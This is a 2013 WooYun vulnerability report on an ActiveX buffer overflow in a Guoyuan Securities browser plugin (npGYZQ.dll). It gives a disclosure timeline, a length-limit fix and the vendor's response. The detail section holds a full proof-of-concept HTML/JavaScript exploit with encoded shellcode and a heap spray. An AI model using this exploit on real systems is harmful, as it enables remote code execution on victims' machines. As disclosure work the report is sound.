当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035056

漏洞标题:国元证券ActiveX溢出任意代码执行漏洞

相关厂商:国元证券

漏洞作者: thesums

提交时间:2013-08-23 09:43

修复时间:2013-11-21 09:43

公开时间:2013-11-21 09:43

漏洞类型:远程代码执行

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-23: 细节已通知厂商并且等待厂商处理中
2013-08-28: 厂商已经确认,细节仅向厂商公开
2013-08-31: 细节向第三方安全合作伙伴开放
2013-10-22: 细节向核心白帽子及相关领域专家公开
2013-11-01: 细节向普通白帽子公开
2013-11-11: 细节向实习白帽子公开
2013-11-21: 细节向公众公开

简要描述:

国元证券,npGYZQ.dll 的UnProtectColor属性超长字符串溢出。

详细说明:

测试环境:windows xp IE 6
国元证券,npGYZQ.dll 的UnProtectColor属性超长字符串溢出。

<html>
<object classid="clsid:CCF36A34-3024-46c5-904A-7867A9818DA3" id='target'></object><body>
<script language="javascript">
var shellcode = unescape(
'%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090'+
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
nops=unescape('%u9090%u9090');
headersize =20;
slackspace= headersize + shellcode.length;
while(nops.length < slackspace) nops+= nops;
fillblock= nops.substring(0, slackspace);
block= nops.substring(0, nops.length- slackspace);
while( block.length+ slackspace<0x50000) block= block+ block+ fillblock;
memory=new Array();
for( i=0; i<200; i++)
memory[i]= block + shellcode;
buffer='';
for( i=0; i<=20; i++)
buffer+=unescape('%0D%0D%0D%0D');
function boom()
{
target.Width=5300;
target.EditStyle='Convex';
target.ProtectColor='#000079';
target.UnProtectColor =buffer;//'#00FF00';
target.EditBkgColor='#ffffff';
}
</script>
<form action="" onsubmit="return boom()">
<input type="submit" value="提交">
</form>
</body>
</html>

漏洞证明:

1.jpg


2.jpg


修复方案:

限制字符串长度

版权声明:转载请注明来源 thesums@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2013-08-28 08:37

厂商回复:

由于此前几天未获知相关版本,在白帽子的帮助下,CNVD得到对应存在漏洞的软件版本,目前还在进一步复现中,同时对P.O.C进行改写。
考虑到潜在的挂马安全风险,先行确认,rank 16

最新状态:

暂无